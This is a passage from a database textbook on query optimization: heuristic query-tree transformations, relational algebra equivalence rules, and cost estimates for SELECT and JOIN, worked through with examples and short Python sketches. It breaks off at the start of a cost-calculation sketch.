Example of Transforming a Query. Consider the following query Q on the
database in Figure A.1: Find the last names of employees born after 1957 who work on
a project named ‘Aquarius’. This query can be specified in SQL as follows:

15Hence, a query graph corresponds to a relational calculus expression.
16The same query may also be stated in various ways in a high-level query language such as SQL.

Q: SELECT Lname
FROM EMPLOYEE, WORKS_ON, PROJECT
WHERE Pname=‘Aquarius’ AND Pnumber=Pno AND Essn=Ssn

AND Bdate > ‘1957-12-31’;

The initial query tree for Q is shown in Figure 5(a). Executing this tree directly first
creates a very large file containing the CARTESIAN PRODUCT of the entire
EMPLOYEE, WORKS_ON, and PROJECT files. That is why the initial query tree is
never executed, but is transformed into another equivalent tree that is efficient to

Figure 5
Steps in converting a query tree during heuristic optimization.
(a) Initial (canonical) query tree for SQL query Q.
(b) Moving SELECT operations down the query tree.
(c) Applying the more restrictive SELECT operation first.
(d) Replacing CARTESIAN PRODUCT and SELECT with JOIN operations.
(e) Moving PROJECT operations down the query tree.
This particular query needs only one record from the PROJECT relation—
for the ‘Aquarius’ project—and only the EMPLOYEE records for those whose date of
birth is after ‘1957-12-31’. Figure 5(b) shows an improved query tree that first
applies the SELECT operations to reduce the number of tuples that appear in the
CARTESIAN PRODUCT.

A further improvement is achieved by switching the positions of the EMPLOYEE and
PROJECT relations in the tree, as shown in Figure 5(c). This uses the information
that Pnumber is a key attribute of the PROJECT relation, and hence the SELECT
operation on the PROJECT relation will retrieve a single record only. We can further
improve the query tree by replacing any CARTESIAN PRODUCT operation that is
followed by a join condition with a JOIN operation, as shown in Figure 5(d).
Another improvement is to keep only the attributes needed by subsequent opera-
tions in the intermediate relations, by including PROJECT (π) operations as early as
possible in the query tree, as shown in Figure 5(e). This reduces the attributes
(columns) of the intermediate relations, whereas the SELECT operations reduce the
number of tuples (records).

As the preceding example demonstrates, a query tree can be transformed step by
step into an equivalent query tree that is more efficient to execute. However, we
must make sure that the transformation steps always lead to an equivalent query
tree. To do this, the query optimizer must know which transformation rules preserve
this equivalence. We discuss some of these transformation rules next.

General Transformation Rules for Relational Algebra Operations. There
are many rules for transforming relational algebra operations into equivalent ones.
For query optimization purposes, we are interested in the meaning of the opera-
tions and the resulting relations. Hence, if two relations have the same set of attrib-
utes in a different order but the two relations represent the same information, we
consider the relations to be equivalent. There is an alternative definition of relation
that makes the order of attributes unimportant; we will use this definition here. We
will state some transformation rules that are useful in query optimization, without
proving them:

1. Cascade of σ. A conjunctive selection condition can be broken up into a cascade
(that is, a sequence) of individual σ operations:

σc1 AND c2 AND ... AND cn(R) ≡ σc1(σc2(...(σcn(R))...))

2. Commutativity of σ. The σ operation is commutative:

σc1(σc2(R)) ≡ σc2(σc1(R))

3. Cascade of π. In a cascade (sequence) of π operations, all but the last one can
be ignored:

πList1(πList2(...(πListn(R))...)) ≡ πList1(R)

4. Commuting σ with π. If the selection condition c involves only those attributes
A1, ..., An in the projection list, the two operations can be commuted:

πA1, A2, ..., An(σc(R)) ≡ σc(πA1, A2, ..., An(R))

5. Commutativity of ⋈ (and ×). The join operation is commutative, as is the
× operation:

R ⋈c S ≡ S ⋈c R
R × S ≡ S × R

Notice that although the order of attributes may not be the same in the relations
resulting from the two joins (or two Cartesian products), the meaning is the same
because the order of attributes is not important in the alternative definition of relation.

6. Commuting σ with ⋈ (or ×). If all the attributes in the selection condition c
involve only the attributes of one of the relations being joined—say, R—the two
operations can be commuted as follows:

σc(R ⋈ S) ≡ (σc(R)) ⋈ S

Alternatively, if the selection condition c can be written as (c1 AND c2), where
condition c1 involves only the attributes of R and condition c2 involves only the
attributes of S, the operations commute as follows:

σc(R ⋈ S) ≡ (σc1(R)) ⋈ (σc2(S))

The same rules apply if the ⋈ is replaced by a × operation.

7. Commuting π with ⋈ (or ×). Suppose that the projection list is L = {A1, ...,
An, B1, ..., Bm}, where A1, ..., An are attributes of R and B1, ..., Bm are attributes
of S. If the join condition c involves only attributes in L, the two operations can
be commuted as follows:

πL(R ⋈c S) ≡ (πA1, ..., An(R)) ⋈c (πB1, ..., Bm(S))

If the join condition c contains additional attributes not in L, these must be added
to the projection list, and a final π operation is needed. For example, if attributes
An+1, ..., An+k of R and Bm+1, ..., Bm+p of S are involved in the join condition c
but are not in the projection list L, the operations commute as follows:

πL(R ⋈c S) ≡ πL((πA1, ..., An, An+1, ..., An+k(R)) ⋈c (πB1, ..., Bm, Bm+1, ..., Bm+p(S)))

For ×, there is no condition c, so the first transformation rule always applies by
replacing ⋈c with ×.

8. Commutativity of set operations. The set operations ∪ and ∩ are commutative,
but − is not.

9. Associativity of ⋈, ×, ∪, and ∩. These four operations are individually
associative; that is, if θ stands for any one of these four operations (throughout
the expression), we have:

(R θ S) θ T ≡ R θ (S θ T)

10. Commuting σ with set operations. The σ operation commutes with ∪, ∩,
and −. If θ stands for any one of these three operations (throughout the
expression), we have:

σc(R θ S) ≡ (σc(R)) θ (σc(S))

11. The π operation commutes with ∪.

πL(R ∪ S) ≡ (πL(R)) ∪ (πL(S))

12. Converting a (σ, ×) sequence into ⋈. If the condition c of a σ that follows a
× corresponds to a join condition, convert the (σ, ×) sequence into a ⋈ as
follows:

(σc(R × S)) ≡ (R ⋈c S)

There are other possible transformations. For example, a selection or join condition
c can be converted into an equivalent condition by using the following standard
rules from Boolean algebra (DeMorgan’s laws):

NOT (c1 AND c2) ≡ (NOT c1) OR (NOT c2)
NOT (c1 OR c2) ≡ (NOT c1) AND (NOT c2)

We discuss next how transformations can be used in heuristic optimization.

Outline of a Heuristic Algebraic Optimization Algorithm. We can now out-
line the steps of an algorithm that utilizes some of the above rules to transform an
initial query tree into a final tree that is more efficient to execute (in most cases).
The algorithm will lead to transformations similar to those discussed in our exam-
ple in Figure 5. The steps of the algorithm are as follows:

1. Using Rule 1, break up any SELECT operations with conjunctive conditions
into a cascade of SELECT operations. This permits a greater degree of free-
dom in moving SELECT operations down different branches of the tree.

2. Using Rules 2, 4, 6, and 10 concerning the commutativity of SELECT with
other operations, move each SELECT operation as far down the query tree as
is permitted by the attributes involved in the select condition. If the condi-
tion involves attributes from only one table, which means that it represents a
selection condition, the operation is moved all the way to the leaf node that
represents this table. If the condition involves attributes from two tables,
which means that it represents a join condition, the condition is moved to a
location down the tree after the two tables are combined.

3. Using Rules 5 and 9 concerning commutativity and associativity of binary
operations, rearrange the leaf nodes of the tree using the following criteria.
First, position the leaf node relations with the most restrictive SELECT oper-
ations so they are executed first in the query tree representation. The defini-
tion of most restrictive SELECT can mean either the ones that produce a
relation with the fewest tuples or with the smallest absolute size.17 Another
possibility is to define the most restrictive SELECT as the one with the small-
est selectivity; this is more practical because estimates of selectivities are
often available in the DBMS catalog. Second, make sure that the ordering of
leaf nodes does not cause CARTESIAN PRODUCT operations; for example, if
the two relations with the most restrictive SELECT do not have a direct join
condition between them, it may be desirable to change the order of leaf
nodes to avoid Cartesian products.18

17Either definition can be used, since these rules are heuristic.

4. Using Rule 12, combine a CARTESIAN PRODUCT operation with a subse-
quent SELECT operation in the tree into a JOIN operation, if the condition
represents a join condition.

5. Using Rules 3, 4, 7, and 11 concerning the cascading of PROJECT and the
commuting of PROJECT with other operations, break down and move lists
of projection attributes down the tree as far as possible by creating new
PROJECT operations as needed. Only those attributes needed in the query
result and in subsequent operations in the query tree should be kept after
each PROJECT operation.

6. Identify subtrees that represent groups of operations that can be executed by
a single algorithm.

In our example, Figure 5(b) shows the tree in Figure 5(a) after applying steps 1 and
2 of the algorithm; Figure 5(c) shows the tree after step 3; Figure 5(d) after step 4;
and Figure 5(e) after step 5. In step 6 we may group together the operations in the
subtree whose root is the operation πEssn into a single algorithm. We may also group
the remaining operations into another subtree, where the tuples resulting from the
first algorithm replace the subtree whose root is the operation πEssn, because the
first grouping means that this subtree is executed first.
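
A toy sketch of the selection pushdown performed in step 2 of the outline; the node
classes are hypothetical, and a selection condition is represented here only by the set
of attributes it uses, which is all that Rule 6 needs to decide whether the SELECT can
be moved below a binary node.

class Relation:
    def __init__(self, name, attrs): self.name, self.attrs = name, set(attrs)

class Select:
    def __init__(self, attrs, child): self.attrs, self.child = set(attrs), child

class Join:                                  # a generic binary node (JOIN or x)
    def __init__(self, left, right): self.left, self.right = left, right

def attrs_of(node):
    if isinstance(node, Relation): return node.attrs
    if isinstance(node, Select):   return attrs_of(node.child)
    return attrs_of(node.left) | attrs_of(node.right)

def push_select(node):
    # Move each SELECT below a binary node whenever one input supplies
    # all attributes used by the selection condition (Rule 6).
    if isinstance(node, Select):
        child = push_select(node.child)
        if isinstance(child, Join):
            if node.attrs <= attrs_of(child.left):
                return Join(push_select(Select(node.attrs, child.left)), child.right)
            if node.attrs <= attrs_of(child.right):
                return Join(child.left, push_select(Select(node.attrs, child.right)))
        return Select(node.attrs, child)
    if isinstance(node, Join):
        return Join(push_select(node.left), push_select(node.right))
    return node

# sigma_{Plocation='Stafford'}(PROJECT x DEPARTMENT) becomes
# (sigma_{Plocation='Stafford'}(PROJECT)) x DEPARTMENT.
tree = Select({'Plocation'},
              Join(Relation('PROJECT', ['Pnumber', 'Plocation', 'Dnum']),
                   Relation('DEPARTMENT', ['Dnumber', 'Mgr_ssn'])))
pushed = push_select(tree)
print(isinstance(pushed, Join), isinstance(pushed.left, Select))   # True True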

Summary of Heuristics for Algebraic Optimization. The main heuristic is to
apply first the operations that reduce the size of intermediate results. This includes
performing as early as possible SELECT operations to reduce the number of tuples
and PROJECT operations to reduce the number of attributes—by moving SELECT
and PROJECT operations as far down the tree as possible. Additionally, the SELECT
and JOIN operations that are most restrictive—that is, result in relations with the
fewest tuples or with the smallest absolute size—should be executed before other
similar operations. The latter rule is accomplished through reordering the leaf
nodes of the tree among themselves while avoiding Cartesian products, and adjust-
ing the rest of the tree appropriately.

7.3 Converting Query Trees into Query Execution Plans
An execution plan for a relational algebra expression represented as a query tree
includes information about the access methods available for each relation as well as
the algorithms to be used in computing the relational operators represented in the
tree. As a simple example, consider query Q1, whose corresponding relational alge-
bra expression is

πFname, Lname, Address(σDname=‘Research’(DEPARTMENT) ⋈Dnumber=Dno EMPLOYEE)

18Note that a CARTESIAN PRODUCT is acceptable in some cases—for example, if each relation has
only a single tuple because each had a previous select condition on a key field.

Figure 6
A query tree for query Q1.

The query tree is shown in Figure 6. To convert this into an execution plan, the opti-
mizer might choose an index search for the SELECT operation on DEPARTMENT
(assuming one exists), a single-loop join algorithm that loops over the records in the
result of the SELECT operation on DEPARTMENT for the join operation (assuming
an index exists on the Dno attribute of EMPLOYEE), and a scan of the JOIN result for
input to the PROJECT operator. Additionally, the approach taken for executing the
query may specify a materialized or a pipelined evaluation, although in general a
pipelined evaluation is preferred whenever feasible.

With materialized evaluation, the result of an operation is stored as a temporary
relation (that is, the result is physically materialized). For instance, the JOIN opera-
tion can be computed and the entire result stored as a temporary relation, which is
then read as input by the algorithm that computes the PROJECT operation, which
would produce the query result table. On the other hand, with pipelined
evaluation, as the resulting tuples of an operation are produced, they are forwarded
directly to the next operation in the query sequence. For example, as the selected
tuples from DEPARTMENT are produced by the SELECT operation, they are placed
in a buffer; the JOIN operation algorithm would then consume the tuples from the
buffer, and those tuples that result from the JOIN operation are pipelined to the pro-
jection operation algorithm. The advantage of pipelining is the cost savings in not
having to write the intermediate results to disk and not having to read them back for
the next operation.

8 Using Selectivity and Cost Estimates
in Query Optimization

A query optimizer does not depend solely on heuristic rules; it also estimates and
compares the costs of executing a query using different execution strategies and
algorithms, and it then chooses the strategy with the lowest cost estimate. For this
approach to work, accurate cost estimates are required so that different strategies can
be compared fairly and realistically. In addition, the optimizer must limit the num-
ber of execution strategies to be considered; otherwise, too much time will be spent
making cost estimates for the many possible execution strategies. Hence, this
approach is more suitable for compiled queries where the optimization is done at
compile time and the resulting execution strategy code is stored and executed
directly at runtime. For interpreted queries, where the entire process shown in
Figure 1 occurs at runtime, a full-scale optimization may slow down the response
time. A more elaborate optimization is indicated for compiled queries, whereas a
partial, less time-consuming optimization works best for interpreted queries.

This approach is generally referred to as cost-based query optimization.19 It uses
traditional optimization techniques that search the solution space to a problem for a
solution that minimizes an objective (cost) function. The cost functions used in
query optimization are estimates and not exact cost functions, so the optimization
may select a query execution strategy that is not the optimal (absolute best) one. In
Section 8.1 we discuss the components of query execution cost. In Section 8.2 we
discuss the type of information needed in cost functions. This information is kept
in the DBMS catalog. In Section 8.3 we give examples of cost functions for the
SELECT operation, and in Section 8.4 we discuss cost functions for two-way JOIN
operations. Section 8.5 discusses multiway joins, and Section 8.6 gives an example.

8.1 Cost Components for Query Execution
The cost of executing a query includes the following components:

1. Access cost to secondary storage. This is the cost of transferring (reading
and writing) data blocks between secondary disk storage and main memory
buffers. This is also known as disk I/O (input/output) cost. The cost of search-
ing for records in a disk file depends on the type of access structures on that
file, such as ordering, hashing, and primary or secondary indexes. In addi-
tion, factors such as whether the file blocks are allocated contiguously on the
same disk cylinder or scattered on the disk affect the access cost.

2. Disk storage cost. This is the cost of storing on disk any intermediate files
that are generated by an execution strategy for the query.

3. Computation cost. This is the cost of performing in-memory operations on
the records within the data buffers during query execution. Such operations
include searching for and sorting records, merging records for a join or a sort
operation, and performing computations on field values. This is also known
as CPU (central processing unit) cost.

4. Memory usage cost. This is the cost pertaining to the number of main mem-
ory buffers needed during query execution.

5. Communication cost. This is the cost of shipping the query and its results
from the database site to the site or terminal where the query originated. In
distributed databases, it would also include the cost of transferring tables and
results among various computers during query evaluation.

For large databases, the main emphasis is often on minimizing the access cost to sec-
ondary storage. Simple cost functions ignore other factors and compare different
query execution strategies in terms of the number of block transfers between disk
and main memory buffers. For smaller databases, where most of the data in the files
involved in the query can be completely stored in memory, the emphasis is on min-
imizing computation cost. In distributed databases, where many sites are involved,
communication cost must also be minimized. It is difficult to include all the cost
components in a (weighted) cost function because of the difficulty of assigning suit-
able weights to the cost components. That is why some cost functions consider a
single factor only—disk access. In the next section we discuss some of the informa-
tion that is needed for formulating cost functions.

19This approach was first used in the optimizer for SYSTEM R, an experimental DBMS developed
at IBM (Selinger et al. 1979).

8.2 Catalog Information Used in Cost Functions
To estimate the costs of various execution strategies, we must keep track of any
information that is needed for the cost functions. This information may be stored in
the DBMS catalog, where it is accessed by the query optimizer. First, we must know
the size of each file. For a file whose records are all of the same type, the number of
records (tuples) (r), the (average) record size (R), and the number of file blocks (b)
(or close estimates of them) are needed. The blocking factor (bfr) for the file may
also be needed. We must also keep track of the primary file organization for each file.
The primary file organization records may be unordered, ordered by an attribute
with or without a primary or clustering index, or hashed (static hashing or one of
the dynamic hashing methods) on a key attribute. Information is also kept on all
primary, secondary, or clustering indexes and their indexing attributes. The number
of levels (x) of each multilevel index (primary, secondary, or clustering) is needed
for cost functions that estimate the number of block accesses that occur during
query execution. In some cost functions the number of first-level index blocks
(bI1) is needed.

Another important parameter is the number of distinct values (d) of an attribute
and the attribute selectivity (sl), which is the fraction of records satisfying an equal-
ity condition on the attribute. This allows estimation of the selection cardinality (s
= sl*r) of an attribute, which is the average number of records that will satisfy an
equality selection condition on that attribute. For a key attribute, d = r, sl = 1/r and s
= 1. For a nonkey attribute, by making an assumption that the d distinct values are
uniformly distributed among the records, we estimate sl = (1/d) and so s = (r/d).20

Information such as the number of index levels is easy to maintain because it does
not change very often. However, other information may change frequently; for
example, the number of records r in a file changes every time a record is inserted or
deleted. The query optimizer will need reasonably close but not necessarily com-
pletely up-to-the-minute values of these parameters for use in estimating the cost of
various execution strategies.

For a nonkey attribute with d distinct values, it is often the case that the records are
not uniformly distributed among these values. For example, suppose that a com-
pany has 5 departments numbered 1 through 5, and 200 employees who are distrib-
uted among the departments as follows: (1, 5), (2, 25), (3, 70), (4, 40), (5, 60). In
such cases, the optimizer can store a histogram that reflects the distribution of
employee records over different departments in a table with the two attributes (Dno,
Selectivity), which would contain the following values for our example: (1, 0.025), (2,
0.125), (3, 0.35), (4, 0.2), (5, 0.3). The selectivity values stored in the histogram can
also be estimates if the employee table changes frequently.

20More accurate optimizers store histograms of the distribution of records over the data values for an
attribute.
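
The difference between the uniform-distribution estimate and a histogram-based
estimate can be seen in a few lines (a sketch using the numbers above):

r = 200                    # employee records
d = 5                      # distinct Dno values
uniform_sl = 1 / d         # uniform assumption: sl = 1/d = 0.2
uniform_s = r / d          # selection cardinality s = r/d = 40 per department

# Histogram of actual record counts per Dno value.
histogram = {1: 5, 2: 25, 3: 70, 4: 40, 5: 60}
selectivity = {dno: count / r for dno, count in histogram.items()}
print(selectivity)         # {1: 0.025, 2: 0.125, 3: 0.35, 4: 0.2, 5: 0.3}

# Estimated versus actual result size for sigma_{Dno=3}(EMPLOYEE):
print(uniform_s, histogram[3])   # 40.0 estimated, 70 actual records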

In the next two sections we examine how some of these parameters are used in cost
functions for a cost-based query optimizer.

8.3 Examples of Cost Functions for SELECT
We now give cost functions for the selection algorithms S1 to S8 discussed in
Section 3.1 in terms of number of block transfers between memory and disk.
Algorithm S9 involves an intersection of record pointers after they have been
retrieved by some other means, such as algorithm S6, and so the cost function will
be based on the cost for S6. These cost functions are estimates that ignore compu-
tation time, storage cost, and other factors. The cost for method Si is referred to as
CSi block accesses.

■ S1—Linear search (brute force) approach. We search all the file blocks to
retrieve all records satisfying the selection condition; hence, CS1a = b. For an
equality condition on a key attribute, only half the file blocks are searched on
the average before finding the record, so a rough estimate for CS1b = (b/2) if
the record is found; if no record is found that satisfies the condition, CS1b = b.

■ S2—Binary search. This search accesses approximately CS2 = log2b +
⎡(s/bfr)⎤ − 1 file blocks. This reduces to log2b if the equality condition is on a
unique (key) attribute, because s = 1 in this case.

■ S3a—Using a primary index to retrieve a single record. For a primary
index, retrieve one disk block at each index level, plus one disk block from
the data file. Hence, the cost is one more disk block than the number of
index levels: CS3a = x + 1.

■ S3b—Using a hash key to retrieve a single record. For hashing, only one
disk block needs to be accessed in most cases. The cost function is approxi-
mately CS3b = 1 for static hashing or linear hashing, and it is 2 disk block
accesses for extendible hashing.

■ S4—Using an ordering index to retrieve multiple records. If the comparison
condition is >, >=, <, or <= on a key field with an ordering index, roughly half
the file records will satisfy the condition. This gives a cost function of
CS4 = x + (b/2). This is a very rough estimate, and although it may be correct on
the average, it may be quite inaccurate in individual cases. A more accurate
estimate is possible if the distribution of records is stored in a histogram.

■ S5—Using a clustering index to retrieve multiple records. One disk block is
accessed at each index level, which gives the address of the first file disk block
in the cluster. Given an equality condition on the indexing attribute, s records
will satisfy the condition, where s is the selection cardinality of the indexing
attribute. This means that ⎡(s/bfr)⎤ file blocks will be in the cluster of file blocks
that hold all the selected records, giving CS5 = x + ⎡(s/bfr)⎤.

■ S6—Using a secondary (B+-tree) index. For a secondary index on a key (unique)
attribute, the cost is x + 1 disk block accesses. For a secondary index on a nonkey
(nonunique) attribute, s records will satisfy an equality condition, where s is the
selection cardinality of the indexing attribute. However, because the index is
nonclustering, each of the records may reside on a different disk block, so the
(worst case) cost estimate is CS6a = x + 1 + s. The additional 1 is to account for
the disk block that contains the record pointers after the index is searched. If the
comparison condition is >, >=, <, or <= and half the file records are assumed to
satisfy the condition, then (very roughly) half the first-level index blocks are
accessed, plus half the file records via the index. The cost estimate for this case,
approximately, is CS6b = x + (bI1/2) + (r/2). The r/2 factor can be refined if better
selectivity estimates are available through a histogram. The latter method CS6b
can be very costly.

■ S7—Conjunctive selection. We can use either S1 or one of the methods S2 to S6
discussed above. In the latter case, we use one condition to retrieve the records
and then check in the main memory buffers whether each retrieved record
satisfies the remaining conditions in the conjunction. If multiple indexes exist,
the search of each index can produce a set of record pointers (record ids) in the
main memory buffers. The intersection of the sets of record pointers (referred to
in S9) can be computed in main memory, and then the resulting records are
retrieved based on their record ids.

■ S8—Conjunctive selection using a composite index. Same as S3a, S5, or S6a,
depending on the type of index.

Example of Using the Cost Functions. In a query optimizer, it is common to
enumerate the various possible strategies for executing a query and to estimate the
costs for different strategies. An optimization technique, such as dynamic
programming, may be used to find the optimal (least) cost estimate efficiently,
without having to consider all possible execution strategies. We do not discuss
optimization algorithms here; rather, we use a simple example to illustrate how cost
estimates may be used. Suppose that the EMPLOYEE file in Figure A.1 has rE = 10,000
records stored in bE = 2000 disk blocks with blocking factor bfrE = 5 records/block
and the following access paths:

1. A clustering index on Salary, with levels xSalary = 3 and average selection
cardinality sSalary = 20. (This corresponds to a selectivity of slSalary = 0.002.)

2. A secondary index on the key attribute Ssn, with xSsn = 4 (sSsn = 1, slSsn = 0.0001).

3. A secondary index on the nonkey attribute Dno, with xDno = 2 and first-level
index blocks bI1Dno = 4. There are dDno = 125 distinct values for Dno, so the
selectivity of Dno is slDno = (1/dDno) = 0.008, and the selection cardinality is
sDno = (rE * slDno) = (rE/dDno) = 80.

4. A secondary index on Sex, with xSex = 1. There are dSex = 2 values for the Sex
attribute, so the average selection cardinality is sSex = (rE/dSex) = 5000. (Note
that in this case, a histogram giving the percentage of male and female
employees may be useful, unless they are approximately equal.)

We illustrate the use of cost functions with the following examples:

OP1: σSsn=‘123456789’(EMPLOYEE)

OP2: σDno>5(EMPLOYEE)

OP3: σDno=5(EMPLOYEE)

OP4: σDno=5 AND SALARY>30000 AND Sex=‘F’(EMPLOYEE)

The cost of the brute force (linear search or file scan) option S1 will be estimated as
CS1a = bE = 2000 (for a selection on a nonkey attribute) or CS1b = (bE/2) = 1000
(average cost for a selection on a key attribute). For OP1 we can use either method
S1 or method S6a; the cost estimate for S6a is CS6a = xSsn + 1 = 4 + 1 = 5, and it is
chosen over method S1, whose average cost is CS1b = 1000. For OP2 we can use
either method S1 (with estimated cost CS1a = 2000) or method S6b (with estimated
cost CS6b = xDno + (bI1Dno/2) + (rE /2) = 2 + (4/2) + (10,000/2) = 5004), so we choose
the linear search approach for OP2. For OP3 we can use either method S1 (with esti-
mated cost CS1a = 2000) or method S6a (with estimated cost CS6a = xDno + sDno = 2
+ 80 = 82), so we choose method S6a.

Finally, consider OP4, which has a conjunctive selection condition. We need to esti-
mate the cost of using any one of the three components of the selection condition to
retrieve the records, plus the linear search approach. The latter gives cost estimate
CS1a = 2000. Using the condition (Dno = 5) first gives the cost estimate CS6a = 82.
Using the condition (Salary > 30,000) first gives a cost estimate CS4 = xSalary + (bE/2)
= 3 + (2000/2) = 1003. Using the condition (Sex = ‘F’) first gives a cost estimate CS6a
= xSex + sSex = 1 + 5000 = 5001. The optimizer would then choose method S6a on
the secondary index on Dno because it has the lowest cost estimate. The condition
(Dno = 5) is used to retrieve the records, and the remaining part of the conjunctive
condition (Salary > 30,000 AND Sex = ‘F’) is checked for each selected record after it
is retrieved into memory. Only the records that satisfy these additional conditions
are included in the result of the operation.
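
The choices above can be reproduced by coding the cost formulas directly; the
following sketch (parameter values taken from the example, variable names chosen
for illustration) computes the candidate costs for OP1 through OP4 and picks the
cheapest one.

bE, rE = 2000, 10000
x = {'Salary': 3, 'Ssn': 4, 'Dno': 2, 'Sex': 1}       # index levels
s = {'Salary': 20, 'Ssn': 1, 'Dno': 80, 'Sex': 5000}  # selection cardinalities
bI1_Dno = 4                                           # first-level index blocks for Dno

linear_key, linear_nonkey = bE / 2, bE                # CS1b and CS1a

op1 = {'S6a': x['Ssn'] + 1, 'S1b': linear_key}                      # equality on key Ssn
op2 = {'S6b': x['Dno'] + bI1_Dno / 2 + rE / 2, 'S1a': linear_nonkey}  # range on Dno
op3 = {'S6a': x['Dno'] + s['Dno'], 'S1a': linear_nonkey}            # equality on Dno
op4 = {'Dno=5': x['Dno'] + s['Dno'],                                # conjunctive condition
       'Salary>30000': x['Salary'] + bE / 2,
       "Sex='F'": x['Sex'] + s['Sex'],
       'S1a': linear_nonkey}

for name, costs in [('OP1', op1), ('OP2', op2), ('OP3', op3), ('OP4', op4)]:
    best = min(costs, key=costs.get)
    print(name, costs, '-> choose', best)
# OP1 -> S6a (5), OP2 -> linear search (2000), OP3 -> S6a (82), OP4 -> Dno=5 (82)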

8.4 Examples of Cost Functions for JOIN
To develop reasonably accurate cost functions for JOIN operations, we need to have
an estimate for the size (number of tuples) of the file that results after the JOIN oper-
ation. This is usually kept as a ratio of the size (number of tuples) of the resulting
join file to the size of the CARTESIAN PRODUCT file, if both are applied to the same
input files, and it is called the join selectivity ( js). If we denote the number of tuples
of a relation R by |R|, we have:

js = |(R ⋈c S)| / |(R × S)| = |(R ⋈c S)| / (|R| * |S|)

If there is no join condition c, then js = 1 and the join is the same as the CARTESIAN
PRODUCT. If no tuples from the relations satisfy the join condition, then js = 0. In
general, 0 ≤ js ≤ 1. For a join where the condition c is an equality comparison R.A =
S.B, we get the following two special cases:

1. If A is a key of R, then |(R ⋈c S)| ≤ |S|, so js ≤ (1/|R|). This is because each
record in file S will be joined with at most one record in file R, since A is a key
of R. A special case of this condition is when attribute B is a foreign key of S
that references the primary key A of R. In addition, if the foreign key B has
the NOT NULL constraint, then js = (1/|R|), and the result file of the join
will contain |S| records.

2. If B is a key of S, then |(R ⋈c S)| ≤ |R|, so js ≤ (1/|S|).

Having an estimate of the join selectivity for commonly occurring join conditions
enables the query optimizer to estimate the size of the resulting file after the join
operation, given the sizes of the two input files, by using the formula |(R ⋈c S)| =
js * |R| * |S|. We can now give some sample approximate cost functions for estimating
the cost of some of the join algorithms given in Section 3.2. The join operations are
of the form:

R ⋈A=B S

where A and B are domain-compatible attributes of R and S, respectively. Assume
that R has bR blocks and that S has bS blocks:

■ J1—Nested-loop join. Suppose that we use R for the outer loop; then we get
the following cost function to estimate the number of block accesses for this
method, assuming three memory buffers. We assume that the blocking factor
for the resulting file is bfrRS and that the join selectivity is known:

CJ1 = bR + (bR * bS) + (( js * |R| * |S|)/bfrRS)

The last part of the formula is the cost of writing the resulting file to disk.
This cost formula can be modified to take into account different numbers of
memory buffers, as presented in Section 3.2. If nB main memory buffers are
available to perform the join, the cost formula becomes:

CJ1 = bR + ( ⎡bR/(nB – 2)⎤ * bS) + ((js * |R| * |S|)/bfrRS)
■ J2—Single-loop join (using an access structure to retrieve the matching

record(s)). If an index exists for the join attribute B of S with index levels xB,
we can retrieve each record s in R and then use the index to retrieve all the
matching records t from S that satisfy t[B] = s[A]. The cost depends on the
type of index. For a secondary index where sB is the selection cardinality for
the join attribute B of S,21 we get:

CJ2a = bR + (|R| * (xB + 1 + sB)) + (( js * |R| * |S|)/bfrRS)

For a clustering index where sB is the selection cardinality of B, we get

CJ2b = bR + (|R| * (xB + (sB/bfrB))) + (( js * |R| * |S|)/bfrRS)

For a primary index, we get

CJ2c = bR + (|R| * (xB + 1)) + ((js * |R| * |S|)/bfrRS)

If a hash key exists for one of the two join attributes—say, B of S—we get

CJ2d = bR + (|R| * h) + ((js * |R| * |S|)/bfrRS)

where h ≥ 1 is the average number of block accesses to retrieve a record,
given its hash key value. Usually, h is estimated to be 1 for static and linear
hashing and 2 for extendible hashing.

21Selection cardinality was defined as the average number of records that satisfy an equality condition on
an attribute, which is the average number of records that have the same value for the attribute and hence
will be joined to a single record in the other file.

■ J3—Sort-merge join. If the files are already sorted on the join attributes, the
cost function for this method is

CJ3a = bR + bS + ((js * |R| * |S|)/bfrRS)

If we must sort the files, the cost of sorting must be added. We can use the
formulas from Section 2 to estimate the sorting cost.

Example of Using the Cost Functions. Suppose that we have the EMPLOYEE
file described in the example in the previous section, and assume that the
DEPARTMENT file in Figure A.1 consists of rD = 125 records stored in bD = 13 disk
blocks. Consider the following two join operations:

OP6: EMPLOYEE ⋈Dno=Dnumber DEPARTMENT
OP7: DEPARTMENT ⋈Mgr_ssn=Ssn EMPLOYEE

Suppose that we have a primary index on Dnumber of DEPARTMENT with xDnumber= 1
level and a secondary index on Mgr_ssn of DEPARTMENT with selection cardinality
sMgr_ssn= 1 and levels xMgr_ssn= 2. Assume that the join selectivity for OP6 is jsOP6 =
(1/|DEPARTMENT|) = 1/125 because Dnumber is a key of DEPARTMENT. Also assume
that the blocking factor for the resulting join file is bfrED= 4 records per block. We
can estimate the worst-case costs for the JOIN operation OP6 using the applicable
methods J1 and J2 as follows:

1. Using method J1 with EMPLOYEE as outer loop:

CJ1 = bE + (bE * bD) + (( jsOP6 * rE * rD)/bfrED)

= 2000 + (2000 * 13) + (((1/125) * 10,000 * 125)/4) = 30,500

2. Using method J1 with DEPARTMENT as outer loop:

CJ1 = bD + (bE * bD) + (( jsOP6 * rE * rD)/bfrED)

= 13 + (13 * 2000) + (((1/125) * 10,000 * 125)/4) = 28,513

3. Using method J2 with EMPLOYEE as outer loop:

CJ2c = bE + (rE * (xDnumber + 1)) + ((jsOP6 * rE * rD)/bfrED)
= 2000 + (10,000 * 2) + (((1/125) * 10,000 * 125)/4) = 24,500

4. Using method J2 with DEPARTMENT as outer loop:

CJ2a = bD + (rD * (xDno + sDno)) + (( jsOP6 * rE * rD)/bfrED)

= 13 + (125 * (2 + 80)) + (((1/125) * 10,000 * 125)/4) = 12,763

Case 4 has the lowest cost estimate and will be chosen. Notice that in case 2 above, if
15 memory buffers (or more) were available for executing the join instead of just 3,
13 of them could be used to hold the entire DEPARTMENT relation (outer loop
relation) in memory, one could be used as buffer for the result, and one would be
used to hold one block at a time of the EMPLOYEE file (inner loop file), and the cost
for case 2 could be drastically reduced to just bE + bD + ((jsOP6 * rE * rD)/bfrED), or
4,513, as discussed in Section 3.2. If some other number of main memory buffers
was available, say nB = 10, then the cost for case 2 would be calculated as follows,
which would also give better performance than case 4:

CJ1 = bD + (⎡bD/(nB – 2)⎤ * bE) + ((js * |R| * |S|)/bfrRS)
    = 13 + (⎡13/8⎤ * 2000) + (((1/125) * 10,000 * 125)/4)
    = 13 + (2 * 2000) + 2500 = 6,513

Figure 7
Two left-deep (JOIN) query trees.

As an exercise, the reader should perform a similar analysis for OP7.
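
For OP6, the four estimates can be checked with the following sketch, which codes the
J1 and J2 formulas with the parameter values given above (illustrative only; variable
names mirror the text's parameters):

from math import ceil

bE, rE = 2000, 10000                 # EMPLOYEE: blocks, records
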